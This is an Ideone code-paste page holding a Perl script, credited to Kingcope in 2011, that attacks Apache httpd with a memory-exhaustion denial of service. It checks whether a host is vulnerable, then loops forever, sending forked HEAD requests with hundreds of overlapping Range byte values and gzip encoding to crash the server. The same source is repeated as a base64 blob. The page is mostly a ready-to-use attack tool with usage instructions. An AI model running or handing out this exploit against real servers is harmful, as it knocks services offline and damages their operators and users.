Ideone.com

fork download

copy

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
 
use IO::Socket;
use Parallel::ForkManager;
 
sub usage {
	print "Apache Remote Denial of Service (memory exhaustion)\n";
	print "by Kingcope\n";
	print "usage: perl killapache.pl <host> [numforks]\n";
	print "example: perl killapache.pl www.example.com 50\n";
}
 
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
 
$pm = new Parallel::ForkManager($numforks);
 
$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
	$p .= ",5-$k";
}
 
for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next; 	
 
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');
 
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
 
while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}
 
sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');
 
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
 
$x = <$sock>;
if ($x =~ /Partial/) {
	print "host seems vuln\n";
	return 1;	
} else {
	return 0;	
}
}
 
if ($#ARGV < 0) {
	usage;
	exit;	
}
 
if ($#ARGV > 1) {
	$numforks = $ARGV[1];
} else {$numforks = 50;}
 
$v = testapache();
if ($v == 0) {
	print "Host does not seem vulnerable\n";
	exit;	
}
while(1) {
killapache();
}

I0FwYWNoZSBodHRwZCBSZW1vdGUgRGVuaWFsIG9mIFNlcnZpY2UgKG1lbW9yeSBleGhhdXN0aW9uKQojQnkgS2luZ2NvcGUKI1llYXIgMjAxMQojCiMgV2lsbCByZXN1bHQgaW4gc3dhcHBpbmcgbWVtb3J5IHRvIGZpbGVzeXN0ZW0gb24gdGhlIHJlbW90ZSBzaWRlCiMgcGx1cyBraWxsaW5nIG9mIHByb2Nlc3NlcyB3aGVuIHJ1bm5pbmcgb3V0IG9mIHN3YXAgc3BhY2UuCiMgUmVtb3RlIFN5c3RlbSBiZWNvbWVzIHVuc3RhYmxlLgojCgp1c2UgSU86OlNvY2tldDsKdXNlIFBhcmFsbGVsOjpGb3JrTWFuYWdlcjsKCnN1YiB1c2FnZSB7CglwcmludCAiQXBhY2hlIFJlbW90ZSBEZW5pYWwgb2YgU2VydmljZSAobWVtb3J5IGV4aGF1c3Rpb24pXG4iOwoJcHJpbnQgImJ5IEtpbmdjb3BlXG4iOwoJcHJpbnQgInVzYWdlOiBwZXJsIGtpbGxhcGFjaGUucGwgPGhvc3Q+IFtudW1mb3Jrc11cbiI7CglwcmludCAiZXhhbXBsZTogcGVybCBraWxsYXBhY2hlLnBsIHd3dy5leGFtcGxlLmNvbSA1MFxuIjsKfQoKc3ViIGtpbGxhcGFjaGUgewpwcmludCAiQVRUQUNLSU5HICRBUkdWWzBdIFt1c2luZyAkbnVtZm9ya3MgZm9ya3NdXG4iOwoJCiRwbSA9IG5ldyBQYXJhbGxlbDo6Rm9ya01hbmFnZXIoJG51bWZvcmtzKTsKCiR8PTE7CnNyYW5kKHRpbWUoKSk7CiRwID0gIiI7CmZvciAoJGs9MDskazwxMzAwOyRrKyspIHsKCSRwIC49ICIsNS0kayI7Cn0KCmZvciAoJGs9MDskazwkbnVtZm9ya3M7JGsrKykgewpteSAkcGlkID0gJHBtLT5zdGFydCBhbmQgbmV4dDsgCQoJCiR4ID0gIiI7Cm15ICRzb2NrID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KFBlZXJBZGRyID0+ICRBUkdWWzBdLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZWVyUG9ydCA9PiAiODAiLAogICAgICAgICAgICAgICAgICAgICAJCQkgUHJvdG8gICAgPT4gJ3RjcCcpOwoKJHAgPSAiSEVBRCAvIEhUVFAvMS4xXHJcbkhvc3Q6ICRBUkdWWzBdXHJcblJhbmdlOmJ5dGVzPTAtJHBcclxuQWNjZXB0LUVuY29kaW5nOiBnemlwXHJcbkNvbm5lY3Rpb246IGNsb3NlXHJcblxyXG4iOwpwcmludCAkc29jayAkcDsKCndoaWxlKDwkc29jaz4pIHsKfQogJHBtLT5maW5pc2g7Cn0KJHBtLT53YWl0X2FsbF9jaGlsZHJlbjsKcHJpbnQgIjpwUHBQcHBwUHBQUHBwUHBwcFBwXG4iOwp9CgpzdWIgdGVzdGFwYWNoZSB7Cm15ICRzb2NrID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KFBlZXJBZGRyID0+ICRBUkdWWzBdLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZWVyUG9ydCA9PiAiODAiLAogICAgICAgICAgICAgICAgICAgICAJCQkgUHJvdG8gICAgPT4gJ3RjcCcpOwoKJHAgPSAiSEVBRCAvIEhUVFAvMS4xXHJcbkhvc3Q6ICRBUkdWWzBdXHJcblJhbmdlOmJ5dGVzPTAtJHBcclxuQWNjZXB0LUVuY29kaW5nOiBnemlwXHJcbkNvbm5lY3Rpb246IGNsb3NlXHJcblxyXG4iOwpwcmludCAkc29jayAkcDsKCiR4ID0gPCRzb2NrPjsKaWYgKCR4ID1+IC9QYXJ0aWFsLykgewoJcHJpbnQgImhvc3Qgc2VlbXMgdnVsblxuIjsKCXJldHVybiAxOwkKfSBlbHNlIHsKCXJldHVybiAwOwkKfQp9CgppZiAoJCNBUkdWIDwgMCkgewoJdXNhZ2U7CglleGl0OwkKfQoKaWYgKCQjQVJHViA+IDEpIHsKCSRudW1mb3JrcyA9ICRBUkdWWzFdOwp9IGVsc2UgeyRudW1mb3JrcyA9IDUwO30KCiR2ID0gdGVzdGFwYWNoZSgpOwppZiAoJHYgPT0gMCkgewoJcHJpbnQgIkhvc3QgZG9lcyBub3Qgc2VlbSB2dWxuZXJhYmxlXG4iOwoJZXhpdDsJCn0Kd2hpbGUoMSkgewpraWxsYXBhY2hlKCk7Cn0=

Runtime error #stdin #stdout 0.02s 5572KB

stdin

copy

Standard input is empty

stdout

copy

Standard output is empty

https://ideone.com/DxnJY

language:

Perl (perl 5.28.1)

created:

visibility:

public

Share or Embed source code

Discover > Sphere Engine API

The brand new service which powers Ideone!

Discover > IDE Widget

Widget for compiling and running the source code in a web browser!

Discover > Sphere Engine API

Discover > IDE Widget

Choose your language